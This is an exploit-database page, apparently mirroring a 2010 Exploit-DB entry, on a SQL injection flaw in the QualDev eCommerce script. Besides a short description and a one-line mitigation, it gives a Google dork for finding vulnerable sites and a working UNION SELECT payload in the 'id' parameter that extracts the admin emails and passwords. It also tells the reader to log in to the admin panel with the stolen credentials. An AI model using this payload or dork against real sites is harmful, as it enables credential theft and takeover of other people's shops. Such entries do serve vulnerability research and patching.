header-logo
Suggest Exploit
vendor:
eCommerce script
by:
ErrNick
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: eCommerce script
Affected Version From: all version
Affected Version To: all version
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: FreeBSD 7.1
2010

QualDev eCommerce script SQL injection vulnerability

A parameter is not properly sanitised before being used in a SQL query. Input passed to 'id' parameter is not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Mitigation:

Input validation and sanitisation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

====================================================
QualDev eCommerce script SQL injection vulnerability
====================================================


# Exploit Title: QualDev eCommerce script SQL injection vulnerability
# Vendor: http://www.qualdev.com
# Date: 15.12.2010
# Version: all version
# Category:: webapps
# Google dork: inurl:"index.php?file=allfile"
# Tested on: FreeBSD 7.1
# Author: ErrNick
# Site: XakNet.ru, forum.xaknet.ru
# Contact: errnick[at]xaknet[dot]ru
# Greatz 2 all memberz of XakNet team ( X1mk0~, Saint, baltazar, SHYLLER,
Kronus, mst && others)

# Intro:

- A parameter is not properly sanitised before  being used in a SQL query.
- Input  passed   to   "id"  parameter  is  not  properly
- sanitised before being used in a SQL query.  This  can be
- exploited  to  manipulate  SQL   queries   by   injecting
- arbitrary SQL code.

# Exploit:


index.php?file=allfile&id=-9999+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin

  logining with admin email && password there
  http://victim/adminpanel/

#Demo:

-
http://www.site.com/index.php?file=allfile&id=-40+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin
-
http://www.site.com/index.php?file=allfile&id=-9999+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin
-
http://www.site.com/index.php?file=allfile&id=-9999+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin


Vizit us at http://xaknet.ru

Navigation

Suggest Exploit

Services By CQR